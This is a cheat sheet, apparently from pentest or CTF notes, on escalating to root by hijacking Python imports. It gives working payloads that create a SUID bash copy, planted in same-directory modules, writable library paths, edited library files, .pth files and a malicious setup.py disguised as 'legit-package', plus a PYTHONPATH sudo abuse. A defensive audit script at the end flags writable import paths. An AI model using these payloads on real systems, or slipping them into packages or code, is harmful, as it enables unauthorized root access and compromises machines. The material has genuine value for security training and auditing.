Overview

If a script runs as root and imports a Python module, you can hijack that import by placing a malicious module earlier in the search path.

Python Module Search Order

1. Directory containing the script (sys.path[0]), not the caller's working directory
2. PYTHONPATH environment variable
3. Default installation paths (/usr/lib/python3/dist-packages, etc.)
Check the search path:
python3 -c 'import sys; print("\n".join(sys.path))'

Find Target Scripts

Scripts Running as Root

# pspy
./pspy64 | grep python

# crontab
cat /etc/crontab | grep python
crontab -l | grep python

# systemd
grep -r "python" /etc/systemd/system/ 2>/dev/null

Check Imports

cat /opt/script.py | grep import

Same Directory Hijack

If the root-run script at /opt/script.py imports utils:
# /opt/script.py
import utils
utils.backup()
And /opt/ is writable:
ls -la /opt/
Create malicious module:
# /opt/utils.py
import os
os.system("cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash")
Wait for the script to execute, then run /tmp/rootbash -p.

Writable Library Path

Check if any directory in Python path is writable:
python3 -c 'import sys; print("\n".join(sys.path))' | while read p; do [ -w "$p" ] && echo "WRITABLE: $p"; done
find /usr/lib/python3* -writable -type d 2>/dev/null
find /usr/local/lib/python3* -writable -type d 2>/dev/null
If writable → drop malicious module with same name as imported module:
echo 'import os; os.system("cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash")' > /usr/lib/python3/dist-packages/target_module.py

PYTHONPATH Injection

If sudo preserves PYTHONPATH:
sudo -l
# (root) NOPASSWD: /usr/bin/python3 /opt/script.py
# env_keep+=PYTHONPATH
Create hijack module:
# /tmp/hijack/importedmodule.py
import os
os.system("/bin/bash")
Run the script through sudo with PYTHONPATH set:
sudo PYTHONPATH=/tmp/hijack /usr/bin/python3 /opt/script.py

Writable .py File (Direct Edit)

If the imported module itself is writable:
ls -la /usr/lib/python3/dist-packages/used_module.py
Inject at the top:
echo -e 'import os\nos.system("cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash")\n' | cat - /usr/lib/python3/dist-packages/used_module.py > /tmp/mod.py && mv /tmp/mod.py /usr/lib/python3/dist-packages/used_module.py

.pth File Injection

.pth files in site-packages directories add paths to sys.path. Lines starting with import are executed. Check if writable:
find /usr/lib/python3* -name "*.pth" -writable 2>/dev/null
ls -la /usr/lib/python3/dist-packages/*.pth
If writable dir exists, create:
echo 'import os; os.system("cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash")' > /usr/lib/python3/dist-packages/evil.pth
Executes on every start of that interpreter, because the site module processes .pth files at startup (unless Python is run with -S).

pip Install Hijack

If a user can run pip install as root, or root runs pip automatically:

Malicious setup.py

from setuptools import setup
import os

os.system("cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash")

setup(
    name="legit-package",
    version="1.0",
)
Install from the package directory:
sudo pip install .

Quick Reference

| Scenario | Technique |
| --- | --- |
| Script directory writable | Drop module in same dir |
| Python lib path writable | Drop module in lib path |
| PYTHONPATH preserved in sudo | Set PYTHONPATH to hijack dir |
| .pth file writable | Inject import os; os.system(...) |
| pip as root | Malicious setup.py |
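
A defender-side audit for the writable-path and .pth scenarios in the Quick Reference above, added here as an example and not part of the original page: it walks a list of import directories (sys.path by default) and reports directories and .py/.pth files that an untrusted account can write, plus .pth files containing import lines. The function names and the trusted_uids parameter are assumptions of this example.

```python
import os
import stat
import sys


def audit_import_paths(paths=None, trusted_uids=(0,)):
    """Return (issue, path) findings for each existing directory in paths.

    trusted_uids is an assumption of this example: owners allowed to
    write to import locations (root only by default).
    """
    findings = []
    for entry in sys.path if paths is None else paths:
        d = os.path.abspath(entry)  # '' in sys.path resolves to the cwd
        if not os.path.isdir(d):
            continue  # zip archives and missing entries are skipped
        if _untrusted_writable(d, trusted_uids):
            findings.append(("writable-dir", d))
        try:
            names = sorted(os.listdir(d))
        except OSError:
            continue  # unreadable directory: nothing more to inspect
        for name in names:
            full = os.path.join(d, name)
            if not name.endswith((".py", ".pth")) or not os.path.isfile(full):
                continue
            if _untrusted_writable(full, trusted_uids):
                findings.append(("writable-file", full))
            if name.endswith(".pth") and _pth_has_import_line(full):
                findings.append(("pth-import-line", full))
    return findings


def _untrusted_writable(path, trusted_uids):
    """True if group/other may write, or the owner is not a trusted uid."""
    st = os.stat(path)
    loose_bits = st.st_mode & (stat.S_IWGRP | stat.S_IWOTH)
    return bool(loose_bits) or st.st_uid not in trusted_uids


def _pth_has_import_line(path):
    """The site module executes .pth lines starting with 'import' + space/tab."""
    with open(path, errors="replace") as fh:
        return any(line.startswith(("import ", "import\t")) for line in fh)


if __name__ == "__main__":
    for issue, path in audit_import_paths():
        print(f"{issue:16} {path}")
```

Run it as root with the same interpreter the privileged script uses. A pth-import-line finding is a prompt to review the file, since some packages ship legitimate .pth files with import lines.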